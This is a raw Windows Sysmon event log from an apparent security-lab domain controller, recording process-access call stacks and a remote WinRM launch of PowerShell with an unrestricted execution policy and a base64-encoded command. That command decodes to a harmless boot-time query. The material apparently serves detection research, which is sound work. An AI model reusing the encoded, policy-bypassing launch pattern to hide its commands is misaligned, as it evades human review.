10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002608Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002607Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002606Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002605Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002604Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002603Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002602Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002601Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E2E-5F80-7900-000000007F01}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002599Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3E2E-5F80-7800-000000007F01}46404644C:\Windows\system32\cmd.exe{733EE690-3E2E-5F80-7900-000000007F01}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002598Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.764{733EE690-3E2E-5F80-7900-000000007F01}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E2E-5F80-13B3-040000000000}0x4b3130HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3E2E-5F80-7800-000000007F01}4640C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x80000000000000002597Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002596Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3E2E-5F80-7700-000000007F01}45764596C:\Windows\system32\conhost.exe{733EE690-3E2E-5F80-7800-000000007F01}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002595Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002594Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002593Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002592Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002591Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002590Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002589Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002588Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002586Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E2E-5F80-7800-000000007F01}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002585Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3E2E-5F80-7600-000000007F01}45644620C:\Windows\system32\WinrsHost.exe{733EE690-3E2E-5F80-7800-000000007F01}4640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x80000000000000002584Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.758{733EE690-3E2E-5F80-7800-000000007F01}4640C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 